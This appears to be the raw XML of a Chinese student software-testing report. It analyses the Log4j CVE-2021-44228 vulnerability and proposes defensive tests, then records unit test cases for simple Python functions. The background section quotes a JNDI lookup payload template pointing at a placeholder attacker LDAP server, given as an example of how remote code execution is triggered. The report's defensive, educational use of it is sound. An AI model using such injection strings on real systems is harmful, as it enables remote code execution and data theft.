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A302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Log4j 漏洞（CVE-2021-44228）分析报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7500039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① 事故背景</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0279E2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发生时间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：2021年12月，漏洞首次被公开披露。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768591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：全球范围内使用Apache Log4j库版本2.0至2.14.1的应用程序，包括云服务、企业系统、Web应用等，涉及苹果、亚马逊、特斯拉等众多知名公司。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3642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：攻击者可通过构造恶意日志消息（如${jndi:ldap://攻击者服务器/ payload}）触发远程代码执行（RCE），导致数据泄露、服务中断、系统被控制等严重安全事件，引发大规模应急响应和修复工作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B4411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② 缺陷类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6565BF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Fault（缺陷根源）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：在Log4j代码中，对用户输入的日志消息未进行充分验证和转义，允许执行JNDI（Java命名和目录接口）查找，这属于设计缺陷和代码实现错误。具体而言，Log4j的Message Lookup功能未限制外部资源加载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547EB5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Error（错误状态）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：当系统处理包含恶意JNDI字符串的日志消息时，内部状态偏离预期，如未授权的网络连接尝试或类加载，导致内存或执行流异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7171F8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Failure（失效表现）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：外部可观察到的系统行为异常，包括服务崩溃、未授权数据访问、远程命令执行等，最终表现为安全漏洞被利用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6638931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③ 测试阶段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6BDCE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本漏洞可在多个测试阶段被发现，尤其是：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A585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单元测试阶段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：开发者应编写测试用例验证Log4j对特殊输入（如JNDI字符串）的处理，确保不会执行未授权操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4762FDC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集成测试阶段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：在系统集成时，通过模拟日志输入测试整体行为，检查是否有异常网络请求或代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207CFE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安全测试阶段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：通过渗透测试、输入模糊测试（fuzzing）或静态代码分析工具（如SAST）扫描，识别潜在的JNDI注入风险。该漏洞的根源在于缺乏输入验证，安全测试应重点关注用户可控数据的处理路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCB670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④ 改进建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C68D2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作为测试负责人，我将设计以下测试策略以防止类似事故重演：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709D4E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强化输入验证测试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：设计测试用例覆盖所有用户输入点（如日志消息、API参数），使用边界值分析和恶意字符串（如JNDI、SQL注入payload）进行测试，确保系统对特殊字符进行转义或拒绝。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00610B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自动化安全扫描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：集成静态应用安全测试（SAST）工具（如SonarQube）定期扫描代码，检测不安全的JNDI使用；同时使用动态应用安全测试（DAST）工具进行运行时漏洞检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D72F8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模糊测试与渗透测试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：实施自动化模糊测试，针对日志处理模块生成随机和恶意输入，模拟攻击场景；定期进行第三方渗透测试，评估整体系统安全性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546141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代码审查与依赖管理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：在代码审查中强制检查第三方库（如Log4j）的使用，确保及时更新版本；建立依赖组件清单，通过工具（如OWASP Dependency-Check）监控已知漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8665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持续监控与响应计划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：部署运行时应用安全监控（RASP）检测异常行为，并制定应急响应流程，以便在漏洞暴露时快速修复和测试补丁</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAE2253"/>
    <w:p w14:paraId="7CAE675A"/>
    <w:p w14:paraId="59DF34C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已识别缺陷：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757619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divide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函数：除数为0时抛出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ZeroDivisionError</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246F0B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find_max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函数：列表全为负数时返回0而非实际最大值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E526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get_item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函数：索引越界时抛出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IndexError</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D7F39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测试用例设计与执行结果</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="11497" w:type="dxa"/>
        <w:tblInd w:w="-15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674"/>
        <w:gridCol w:w="2081"/>
        <w:gridCol w:w="2003"/>
        <w:gridCol w:w="2438"/>
        <w:gridCol w:w="1868"/>
      </w:tblGrid>
      <w:tr w14:paraId="6102D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9" w:hRule="atLeast"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1433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EE4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测试用例ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="167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105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测试函数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="208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3B2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输入参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="200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3F7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243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E02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186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D2B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测试状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0E1C6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86B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TC001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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53F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divide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="208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763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(10, 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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90E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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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116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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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ABC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7FF58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C1A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TC002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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AB7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divide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="208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569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(10, 0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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463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抛出ZeroDivisionError异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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3E9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ZeroDivisionError: division by zero</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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1203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失败（缺陷1）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3E61E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B84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TC003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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131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find_max</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="208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85D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[1, 5, 3, 9, 2]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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764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4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208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8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676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79A2B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4C7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TC004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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117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find_max</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="208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98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[-1, -5, -3, -9, -2]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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438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-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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03C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8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0D5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失败（缺陷2）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="78D61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44E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TC005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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1E4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get_item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="208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D11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([1, 2, 3], 1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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348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4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1CA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8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372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629E0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623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TC006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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7CA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get_item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="208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A6B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([1, 2, 3], 5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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C2D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抛出IndexError异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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DC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IndexError: list index out of range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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4839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失败（缺陷3）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F98193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详细测试执行记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ECCE3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TC001: divide函数正常除法测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366B2FA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输入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8EAC7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result = divide(10, 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26602E9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预期: 5.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE9A64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实际: 5.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A692E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状态: ✅ 通过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BBFF8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TC002: divide函数除数为零测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5BE5C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输入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1922DC5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result = divide(10, 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BC61C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预期: 抛出ZeroDivisionError</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F300F5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实际: ZeroDivisionError: division by zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBEDA2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状态: ❌ 失败 - 缺陷1确认</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A24683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TC003: find_max函数正常列表测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120215A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# 输入  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113F628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result = find_max([1, 5, 3, 9, 2])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE5E87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预期: 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5480FB8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实际: 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6119ACD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状态: ✅ 通过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C81BED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TC004: find_max函数全负数列表测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481DEB6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输入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2152002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result = find_max([-1, -5, -3, -9, -2])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59767A2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预期: -1 (实际最大值)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141162B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实际: 0 (错误结果)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAA057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状态: ❌ 失败 - 缺陷2确认</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A550C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TC005: get_item函数有效索引测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704052F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输入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0610C92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result = get_item([1, 2, 3], 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C1A1B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预期: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED1449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# 实际: 2  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1943A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状态: ✅ 通过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A572ED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TC006: get_item函数索引越界测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0679F0D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输入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D55C08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result = get_item([1, 2, 3], 5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D84EE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预期: 抛出IndexError</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10551D4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实际: IndexError: list index out of range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DA722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00" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine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# 状态: ❌ 失败 - 缺陷3确认</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506D1E6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缺陷分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668989A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缺陷1: divide函数 - 除数为零处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0DE9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根本原因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缺少输入参数验证，未检查除数是否为0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2765E8B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缺陷2: find_max函数 - 全负数列表处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0970C3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根本原因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初始值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max_val = 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设置不当，应使用列表的第一个元素作为初始值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0BE8A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缺陷3: get_item函数 - 索引越界处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D7F9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根本原因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缺少索引边界检查</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131645BC"/>
    <w:p w14:paraId="571AB2E6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三：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FDBD06"/>
    <w:p w14:paraId="6D8FA40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 定义待测试的简单函数 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DACDD5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def add(a, b): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCC00D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return a + b </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580F275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 编写测试用例 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4699062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def test_add(): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384A793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 断言：验证1+2的结果是否等于3 </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="6C4EF27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assert add(1, 2) == 3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EB02C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 额外测试：验证负数相加 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDCDBB4"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assert add(-1, 1) ==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716EAD"/>
    <w:rsid w:val="53283BC9"/>
    <w:rsid w:val="6B8D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2025-11-21T10:50:47Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>角湛熬毓拥</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-21T11:07:53Z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1F25129F4D3E48039D9510ADEE6F83F0_12</vt:lpwstr>
  </property>
</Properties>
</file>